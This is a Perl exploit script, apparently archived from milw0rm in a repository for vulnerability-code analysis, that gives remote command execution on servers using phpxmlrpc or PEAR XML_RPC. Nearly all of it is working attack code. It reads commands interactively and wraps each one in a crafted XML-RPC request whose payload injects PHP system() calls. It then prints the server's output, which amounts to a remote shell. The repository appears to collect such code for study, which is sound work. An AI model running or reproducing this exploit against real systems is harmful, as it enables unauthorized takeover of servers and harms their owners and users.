lilbool/vuln-code-analysis
0
1#!/usr/bin/perl -w
2# ********************************************************
3# XML-RPC Remote Command Execution Exploit By Mike Rifone
4# ********************************************************
5# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
6# you need is to put the url to the server and u get shell
7# Dis is my first exploit but hey it works :D ~Mike@Rifone
8# ********************************************************
9
10use LWP::UserAgent;
11
12$brws = new LWP::UserAgent;
13$brws->agent("Internet Explorer 6.0");
14
15$host = $ARGV[0];
16
17if ( !$host )
18{
19 die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
20}
21
22while ( $host )
23{
24
25 print "xmlrpc\@\#";
26
27 $exec = <STDIN>;
28 $data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";
29
30 $send = new HTTP::Request POST => $host;
31 $send->content($data);
32 $gots = $brws->request($send);
33 $show = $gots->content;
34
35 if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
36 {
37 print $2 . "\n";
38 }
39 else
40 {
41 print "$show\n";
42 }
43
44
45}
46
47# milw0rm.com [2005-07-04]